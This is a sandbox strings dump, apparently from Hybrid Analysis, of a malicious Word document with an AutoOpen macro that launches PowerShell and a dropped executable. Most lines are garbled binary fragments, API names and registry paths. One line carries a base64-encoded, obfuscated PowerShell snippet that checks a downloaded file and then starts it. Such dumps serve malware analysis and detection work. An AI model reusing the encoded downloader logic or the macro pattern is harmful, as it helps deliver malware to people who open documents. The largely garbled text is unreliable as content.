Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

s,npVC5s=8{Z!$;O>lWQ'($98=#8!v

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

s.fNgkZ1<9Gi?~?dD&PVKW|Rk.=>~t7u?TZ{jSV2mAQ4\nW^

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

S7mnN7w("i62M9lpda5hbq7"376LhEQdchUrnjZVB@tvoQP2B"1974@rziLBQ56~ljE83Z379EoTXfD4ONDCnCzm"584CZISLBTW

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

S?!cdk!cdk$Zn^RbikViiblk3.ThisDocument.autoopenIIBLK3.THISDOCUMENT.AUTOOPEN@!i@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5&.[`)TahomaC.,{ @Calibri LightACambria Math"1h7ug7ugZZ!0hh@P$Pn^6!xxI0 Hiiblk3,o2WPj_ 0L@2WPj_00LZ^TW5BaU=P^-<7stdole>Astdkl@e

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

SbqJB 47HNX`I

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

SbqJsB=250, 250, 1610, 918,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ScrollbarEvents

Unicode based on Runtime Data (WINWORD.EXE )

SearchPathW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SetErrorMode

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SetLastError

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SetThreadUILanguage

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Shell_TrayWnd

Unicode based on Runtime Data (WINWORD.EXE )

SHLWAPI.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ShowWindowJkIOwYItdVGwVIiuD1JME1lI1rzmzA8PMnlXk0Stiiblk3#m"$qu{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

SHStrDupW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Site 1

Unicode based on Runtime Data (WINWORD.EXE )

Site 10

Unicode based on Runtime Data (WINWORD.EXE )

Site 11

Unicode based on Runtime Data (WINWORD.EXE )

Site 12

Unicode based on Runtime Data (WINWORD.EXE )

Site 13

Unicode based on Runtime Data (WINWORD.EXE )

Site 14

Unicode based on Runtime Data (WINWORD.EXE )

Site 15

Unicode based on Runtime Data (WINWORD.EXE )

Site 16

Unicode based on Runtime Data (WINWORD.EXE )

Site 17

Unicode based on Runtime Data (WINWORD.EXE )

Site 18

Unicode based on Runtime Data (WINWORD.EXE )

Site 19

Unicode based on Runtime Data (WINWORD.EXE )

Site 2

Unicode based on Runtime Data (WINWORD.EXE )

Site 20

Unicode based on Runtime Data (WINWORD.EXE )

Site 3

Unicode based on Runtime Data (WINWORD.EXE )

Site 4

Unicode based on Runtime Data (WINWORD.EXE )

Site 5

Unicode based on Runtime Data (WINWORD.EXE )

Site 6

Unicode based on Runtime Data (WINWORD.EXE )

Site 7

Unicode based on Runtime Data (WINWORD.EXE )

Site 8

Unicode based on Runtime Data (WINWORD.EXE )

Site 9

Unicode based on Runtime Data (WINWORD.EXE )

Sk]V=M?Kq>f5:5KQIEeSd`jiOfZJfZT.S4bO(h3?Gqu@\oM

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Sleep

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

sNwb4Sb?UM_p'G}akJuQRlht9[3h.dr;G^S^&R^!'-Xl~uz_S `q:74=iXmfG

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

so+Yiy1\)-RJyM4tGfb]lD|AuNkRipE]nvUjmK-<vLq`-l

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SOFTWARE\Microsoft\PowerShell

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SOFTWARE\Microsoft\PowerShell\%1!ls!

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

sooonorw(

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

SpellingAndGrammarFiles_1033

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_1036

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_3082

Unicode based on Runtime Data (WINWORD.EXE )

sPH]x,}zIxWF76+1FM)z!pI804bGt>}rASSW$a Hm@MEq/_ef3"EGN>W09lF-h3;.((I(fA!L$2Bc;Hy,.xB*2dm+?UteY<?g@aqJ[Wdb$ej^V[WuS'wQ:}+@aq_&N$51Cq"%0r;[w:mezT2c1^p>Q)&W,N&k1L,xej

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

SpinbuttonEvents

Unicode based on Runtime Data (WINWORD.EXE )

SSS<N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}8(%HxAttribute VB_Name = "zt7hFLK"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Start

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

stdole`Project-ThisDocument<_EvaluateNormalOfficeuDocumentjModule1bShSpmfIRHf8TqzaNjwis4Wl5E7oGZisQwf3iOKJiuc4DzJ5tLvZzSjm1MRPaC5EO6UYTHvDDzPwSjLcRK57WwSnfi8mBwn0c8sUidi8L1Eij~vQarXRpNK30s1iw!hM6trzzmzDPaoqkSNqt7dcdMn18wq$DS7SLIw3zbUBNrF0Jj76iNQNFEcQSzmtT0iCW3dK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

StringFileInfo

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

StW]e&/A

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

SvM Pv

Ansi based on Memory/File Scan (936.exe , 00025715-00002888.00000000.25930.0040E000.00000004.mdmp)

sx|.y, HnA#5WVq7{x G#a

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

sZA#ZC?Kmr,u;*h<vA`(K|5WKW]mze?Wn.M#Zq@rsz[ZF%NhqE!h\=:s?L]es+G_vuzZ=@GX\^

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

t-ip`$dHWH\t5qZz)$5$cs;nttx91lI-$9]tv4UbT#kA9sm%$TF6YtmOh_/I-#6)a5t2( x\jh41F@9p_d.]]ie!p1%9'$x/~uAmm7{CEB09\W2h[_5iW[ek>sF{N9;4n>$P#{K\ CvMQ%G&jb

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

t0pLjB=50, 50, 1410, 718,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

T1_ZDrYR("CUGTwnBg"BJCzs$W580(DIMNkcz7ojcJ("rj`iimdp433CJrk2z

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

TabStripEvents

Unicode based on Runtime Data (WINWORD.EXE )

takln9

Ansi based on Image Processing (screen_10.png)

TerminateProcess

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

theme/theme/_rels/themeManager.xml.relsPK]<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ThisDocument0P5ed28fe5ThisDocumentrSbqJsB0M5ed28fe4SbqJsBH%t0pLjB0E5ed28fe4lt0pLjBcu0}Vn3uja0F5ed28fe4pVn3ujankH}IRZCT20G5ed28fe4tIRZCT2aF`}v_EwVS8V0H5ed28fe4{v_EwVS8V`Yx%RjMGj40I5ed28fe4RjMGj4%wSFzhwwB0J5ed28fe4wSFzhwwBK<%ZaojtM0K5ed28fe4ZaojtMd%zt7hFLK0L5ed28fe4zt7hFLK%vawzMw0N5ed28fe5vawzMw/dzpqM1P0O5ed28fe5dzpqM1PF(x`0H<\YK[|Jk(_Ok/vAKf3C*"UbL;^+*D0}wchLAsO@C'rokL.kAyZn^=FL>jH7CFu,\'EE._6EK%;U~WM7Rrs5YFunctionNamesetTextWordkVBAWin16~Win32Win64xMacVBA6#VBA7#Project1

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ThisDocument=0, 0, 0, 0, C

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ThisDocumentThisDocumentt0pLjBt0pLjBVn3ujaVn3ujaIRZCT2IRZCT2v_EwVS8Vv_EwVS8VRjMGj4RjMGj4wSFzhwwBwSFzhwwBZaojtMZaojtMzt7hFLKzt7hFLKSbqJsBSbqJsBvawzMwvawzMwdzpqM1PdzpqM1P

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Ti}VB

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

TMM$k2<H!~\3hiCoik-$4 lnfQTm4#Q6%l04rp(>Z?W*u5q"}tq| 3ppAFsC+ZjjEFAc

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Translation

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

TulHsvych4HqV:6xkgA,H'mg66VpvCv*h@`#`g''#`VMQXeDe{LCr82YjTDn,ubI+L.-!k#~"w

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Tv=mUv

Ansi based on Memory/File Scan (936.exe , 00025715-00002888.00000000.25930.0040E000.00000004.mdmp)

TvOmSv

Ansi based on Memory/File Scan (936.exe , 00025715-00002888.00000000.25930.0040E000.00000004.mdmp)

Tw-kJi

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

tw1.z$I8G7/v-^&i5J\*jim,N{AHi#9A"zTO=-= ]{#|HY6}KUmSUS)9YYKt11Z ;1X3~;ilF8HCq@[]L!815g I->w='GRr<[9 hJ-'YeV"8Z 9,5tVm:vTFX<gpA BewUY=iF/"p7sQm

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

TXr qM9$5r mh[e5Z7BSzKp."BA-&c9'!~w=SAR:`kh$#$DDD@DDZf=-Y\_a$2y4D@DDEWz3{C]Qef>1@d" """ """ """ """ """ """ """ """ *B|/`=P,oWqCN"zh67^4X8+gj1Vv:`?>"(" "":Ima3GAEQGW*)j#tR iAi~8l~,?g8]~:6U{!Fh27AQ_7a\<3qW8x]ACOkS0X0A

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

U5p%]w

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

u:'[F

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

UcdV~vfs3U

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

uCx9li?5GdJ[c:h.HG.nl9drSlu

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

UFXwTnC469")

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

UheR}hO>H:^{IpCO39V.e<0i)~nbzz97mG-o#6}/v]?fl1$

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

UnhandledExceptionFilter

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

UnmapViewOfFile

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

USER32.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

uVO==P9x{^$9yg(]t:vK\MuK-!#80x{CZ5BEUP05# qH }lzN=;D2g^\G21;C^RUIz"$3`oW

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

V &3}`'j

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

v,Z':aQd1sO~g.xj]MFnkRS/l uY9[z-UOFZv)(!~15CDrsAo }"N1u8$cskfmfX*)QGP"sZppA -YL&68sWQ4AI-Zcisr:EvMU-M7Pi@

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

v5Cdb./o'zOYG*YA=;=]KiWY#zz>[%&Q#q!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

v]/Sc& 29BZlj/omVFy4r=uWft2L'..hhShp8=t7,n>6Lwi3\$#[P_tI#vN)i-BId 2I 9@_T\itU</swb:{RuI;7=s8-_-Gh rzLyiK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

v_EwVS8V=125, 125, 1485, 793,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

v`laB1^:C,qAL_TO98!@@TJ\iUR;VwUS

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

vawzMw=275, 275, 1635, 943,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

VBAFiles

Unicode based on Runtime Data (WINWORD.EXE )

version

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

VEx?fYL]JFI~LU9 sSP

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

vfgffffffgp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

vhvHmypr8H

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

vKSE1sK""x{fhc^oM~=-=O{FZ 0f@h,au=Mu1>)cx-s2XpH|6b,F">!=/ovH*..Yx;C^GN1@+QUMKREU8wnp:NmnIV;-m33<HQ>kS::H[{9V3wL_XlEw5iv^#)b! 8A<;U:AiEK.sL"fK9#8# @}atA}b?D8mJ4ymSPy6G9{Eu_r.b+Etd]omswoGD-$D?vw7t3QRe5'C(4w2GiAt(X`X=

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

vMVRW{!hPI

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Vn3uja=75, 75, 1435, 743,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Vn3ujaZaojtMdzpqM1Ppzt7hFLK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

VnP3uja

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

vom.)5TnE~1F]5x,va9V|s Itd80|_ecvPLrl_l*D

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

vp>.}[FuO<D==9nA 0FAh{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

VRx[am/^f;scZaMzSijR

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

VS_VERSION_INFO

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

VUv,UUv

Ansi based on Memory/File Scan (936.exe , 00025715-00002888.00000000.25930.0040E000.00000004.mdmp)

vY+@.q09Z6C-VV:Y8%k$@$8NCAlp$c)5QbTmQJ!lOn\],S$3$qsMi[CAwn MWFOtmRf6BxXn8N5.npVC5s=8{Z!$;O>zDX/,tdex7x>818k+gV_MKPidrpSG>w;J#o-`ww{i1*/jj((0y`$N9C?KY/&Z=gmVjjf

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

v|ggw

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

W!@z)

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

w+m-bv5ok^\K<g shMpp=:s?LecU\5u[H\CX@d~AW+MKe5}4"H A(#^>F_THyVh[:QPxL9kOc$@%MCmf=}[;s]

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

w8XNHTjONOq,W40*M9XNW8'vL)!(CuKeE

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wC66SOCdIIzTe@bk4zRvCD@z1TFjd4 `!t540oJb("NYk_EmbD{JiN_Ocz"488

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wcschr

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

wcsncmp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

wcsrchr

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

wcstoul

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

WE[Sv{IcpN=uKnj},G23$?a.wMvWTmhpxr*%]Wll.9!g&6{nuK[r+2#f.8pp#FHeEj:Ck]ps4Fs_;m7]b

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Wg\dl.@Ap&b13sXl[[({9{Sd-*;w?eIYiUU)

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wHI9iW=d<RT[8XI$k;6

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

WHTMLControlEvents

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents1

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents10

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents2

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents3

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents4

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents5

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents6

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents7

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents9

Unicode based on Runtime Data (WINWORD.EXE )

Width9BiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcA2SQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIqhrIRVBwIPN7jp186AB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAO9wAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMNBi0pc69434k0NOCoNbH0YOLzh4600439jHbS66c821*AVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA==

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

WindowsPowerShellHelp.chm

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

WinHttpAutoProxySvc

Unicode based on Runtime Data (powershell.exe )

Wk\d0Z'hkHqZ77*Mu_WDFik]R"yC]k%R]`u,fXdn!n\^{##~

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wM9J`=,mWT]n;v[9sFxpHp<[o:v{C*`BZ_%I$v2;J,R]u\L&O(@]Gj:Wl7D}58y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wMP_bJ/-d@zpqM1Pdp`HM@P

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Word2o1o

Ansi based on Image Processing (screen_10.png)

WORDFiles

Unicode based on Runtime Data (WINWORD.EXE )

WriteConsoleW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

WriteFile

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ws PowerShell

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

wSFzhwwB=175, 175, 1535, 843,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

WUoKmIoFA}ZeR9Y$22FBc6=w+m

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wvJv<6q+0\dK+v&b'3-XjZ")" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""TGu?iV@jjU}=Wo/[&F_4vbFW?bF

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

wWrKDd#@W]jO2#"_*<dk]s=Pxtgt'oL.snG)d\`CZKX7#niuXq1YoXbb+;[M"." """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""TGu?iV@jjU}CN"zh67^4X8+j0j0i=?>Ua

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

x4mmEKQv<H*\)q0ywkOONjT|?:muJ.z26RC#pr{aW*Wp``KFYmiYS;2K$wyg0rycyHU^v=kb5~3'[z# bHJIUXM1XZG~MQZU-&60e+.Njk0'UTFW|:p`$Zp;VW;lta>quTL9Q]sWDScY$T<i[D5C }+Vh6~u:MPk<*gfIx/,ovT:6"TWrLojjU*D|ZaC_E}f?xvFEvW.1]h?QUh?QCH~8O=_%\0G[4FM-

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

X6mjd$_F99uH2TGw|N6iT0jtLmTb1Dbj"s_zCdYobb826("Liv1GEwzC2ca3X0lJzGU2kNdv160c6 ("hRWq2dVw2KvmwJUm

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

x9'%^|oC`q>3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

x^Yut^.kIJ},2^-QrngQ/}_~SMtNc0Le-sbiu>Fq6,8Syx~|g{xzO_(T9UCe6zDdRr$j

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

xME(SSS<N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}8(%HxAttribute VB_Name = "RjM@Gj4"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

xml version='1.0' encoding='utf-8' standalone='yes'?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" > <description>PowerShell</description> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo></assembly>

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

XOIssKZ2N9v(3Cnr\\ihf9 kzf8=9W/v-R`4\ZUQ4k,.>$$>78kU\9$}F[T9pq~~H7T:bMa;h#=L@+c*\3y#0+#$jZZxpDD% 'a&n]n4]mu\{h j$

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

xtttstw}'

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

Y_%2A$q8

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

yCH |!}{Oiz0u7

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

